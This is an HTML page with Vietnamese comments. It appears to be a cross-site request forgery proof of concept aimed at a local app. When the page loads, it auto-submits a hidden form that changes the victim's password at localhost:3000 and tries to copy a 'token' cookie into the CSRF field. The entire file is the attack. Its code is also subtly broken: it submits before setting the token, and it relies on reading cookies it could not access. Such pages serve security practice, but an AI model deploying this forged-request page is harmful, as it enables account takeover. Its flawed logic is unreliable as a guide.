<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Fake change-password</title>
  </head>
  <body>
    <form action="http://localhost:3000/change-password" method="POST">
      <input
        type="hidden"
        name="new-password"
        value="L3MKM4{m3o_m3o_m3o_chuc_mU4g_Ban}"
      />
      <input type="hidden" id="cookie" name="_csrf" />
    </form>
    <script>
      document.forms[0].submit(); // Tự động gửi biểu mẫu khi trang web giả mạo được tải -->
      // Để lấy giá trị của một cookie
      console.log(document.cookie);
      function getCookie(cname) {
        let name = cname + "=";
        console.log(name);
        let decodedCookie = decodeURIComponent(document.cookie);
        console.log(decodedCookie);
        let ca = decodedCookie.split(";");
        for (let i = 0; i < ca.length; i++) {
          let c = ca[i];
          while (c.charAt(0) == " ") {
            c = c.substring(1);
            console.log(c);
          }
          if (c.indexOf(name) == 0) {
            return c.substring(name.length, c.length);
          }
        }
        return "sqwdwadad";
      }

      const tokenCookie = getCookie("token");
      const csrfField = document.getElementById("cookie");
      // Gán giá trị của cookie vào trường input
      csrfField.value = tokenCookie;
      console.log(
        "Giá trị của cookie 'username': " + JSON.stringify(tokenCookie)
      );
    </script>
  </body>
</html>
